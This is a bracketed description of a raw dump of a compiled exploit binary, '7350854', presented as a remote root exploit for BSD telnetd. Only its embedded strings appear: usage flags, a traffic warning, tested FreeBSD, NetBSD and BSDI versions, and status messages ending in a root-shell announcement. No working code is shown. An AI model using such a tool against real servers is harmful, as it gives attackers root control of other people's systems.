[Raw dump of a compiled FreeBSD ELF executable (exploit binary "7350854"); the machine code, relocation data and symbol tables are not reproducible as text. Only the embedded program strings are recoverable:]

7350854 - x86/bsd telnetd remote root by zip, lorian, smiler and scut.

usage: [-c] [-f] -n num
  -n num   number of populators, for testing purposes
  -c       check exploitability only, do not exploit
  -f       force mode, override check results

WARNING: this is no easy exploit, we have to get things tightly aligned and send 16/34mb of traffic to the remote telnet daemon. it might not be able to take that, or it will take very long for it (> 1h). beware.

tested: FreeBSD 3.1, 4.0-REL, 4.2-REL, 4.3-BETA, 4.3-STABLE, 4.3-RELEASE; NetBSD 1.5; BSDI BSD/OS 4.1

Runtime status strings: "failed to connect", "aborting", "failed to connect the second time", "check: PASSED, using %dmb mode", "check: FAILED", "too much blacklisting, giving up...", "sleeping for 10 seconds to let the process recover", "ok, you should now have a root shell".

Compiler tag: GCC: (GNU) c 2.95.3 20010315 (release) [FreeBSD]